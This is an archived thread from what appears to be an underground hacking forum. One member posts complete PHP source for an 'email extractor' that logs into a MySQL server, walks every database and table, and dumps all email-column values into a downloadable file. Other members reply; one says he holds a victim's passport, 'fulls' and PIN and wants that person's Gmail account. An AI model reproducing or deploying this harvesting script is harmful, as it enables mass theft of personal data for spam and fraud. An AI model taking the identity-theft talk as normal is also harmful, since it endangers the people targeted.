PDA

View Full Version : Email extractor (mysql)



Server_CM
01-25-2015, 11:49 AM
today i want to share witch you one of my new tools to extract emails from a mysql db Smile
you just need the login data and then you just need to hit send

http://s29.postimg.org/6iys1dxfr/pic1.jpg

http://s18.postimg.org/4uwf1985l/pic2.jpg



<style> #sbz {text-align: center;color: #000;font-size: 30px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;} span.tab{padding: 0 10px; } .box{ -moz-box-shadow: 1px 1px 8px #666; -webkit-box-shadow: 1px 1px 8px #666; box-shadow: 1px 1px 8px #40D5D2; border: solid 1px black; -webkit-border-radius: 8px 8px 0px 0px; -moz-border-radius: 8px 8px 0px 0px; border-radius: 8px 8px 0px 0px; margin: 15px 0px; background-color: #F5F5F5; opacity: 0.8; width:840px; } #footer { position : absolute; bottom : 0; height : 40px; margin-top : 40px; } body{ background-color: black; background: url('http://images7.alphacoders.com/332/332232.jpg') no-repeat center center fixed; } </style> <?php @set_time_limit(0);error_reporting(0); echo '<html><head><title>Email extractor</title></head><body><center><pre id="sbz">Email extractor by T3N38R15</pre><div class="box" align="left"><center>'; if(!empty($_GET["rm"])){unlink('emails.txt');echo '<script> alert("email file deleted");window.location="' . $_SERVER["PHP_SELF"] . '";</script>';} if(!empty($_POST["server"])){ $vr=false;if(!empty($_POST["filesf"])){if($_POST["filesf"]=="on"){$vr=true;}} if($vr==true){ignore_user_abort(true);$fh = fopen("emails.txt", 'w') or die("can't open file " . getcwd() . '/emails.txt');} mysql_connect($_POST["server"], $_POST["user"], $_POST["pw"]) OR die("not connected"); $res1 = mysql_query("SHOW DATABASES"); echo '<textarea style="width:98%;" rows="25">'; while ($row1 = mysql_fetch_assoc($res1)) { $res2 = mysql_query("SHOW TABLES FROM " . $row1['Database']); while ($row2 = mysql_fetch_assoc($res2)) { $res3 = mysql_query("SHOW COLUMNS FROM " . $row1['Database'] . "." . $row2['Tables_in_' . $row1['Database']]); while ($row3 = mysql_fetch_assoc($res3)) { if(strstr($row3['Field'], "email")) { $res4 = mysql_query("select " . $row3['Field'] ." FROM " . $row1['Database'] . "." . $row2['Tables_in_' . $row1['Database']]); while ($row4 = mysql_fetch_assoc($res4)) {if(!empty($row4[$row3['Field']])){if(strstr($row4[$row3['Field']], "@")){echo $row4[$row3['Field']] . "\n";if($vr==true){fwrite($fh, $row4[$row3['Field']] . "\n");}}}} } } } } echo '</textarea>'; if($vr==true){fclose($fh);echo '</br><a href="emails.txt">Here are your Emails</a><span style="padding: 0 20px;"></span><a href="' . $_SERVER["PHP_SELF"] . '?rm=1">Remove email File</a>';} }else{ echo '<form method="POST"><table><tr><td>Server : <input type="text" name="server" value="localhost"\></td></tr><tr><td>User : <input type="text" name="user" value="root"\></td></tr><tr><td>Password : <input type="text" name="pw" value=""\></td></tr><tr><td>Save-to-file : <input type="checkbox" name="filesf"\></td></tr><tr><td><input type="submit" value="send"\></td></tr></table></form>'; } echo '</center></div></center></body></html>';

bigbrobig
02-24-2019, 10:14 PM
thank youuu

balbes5555
03-12-2019, 06:48 PM
how to get it

amr843324
07-01-2019, 10:49 PM
good ! but if it extract from facebook it will be more usefull

ASECOND
07-14-2019, 06:55 AM
How much?

Would love this fellas gmail. Got passport, fulls, pin number, but gmail would seal the deal.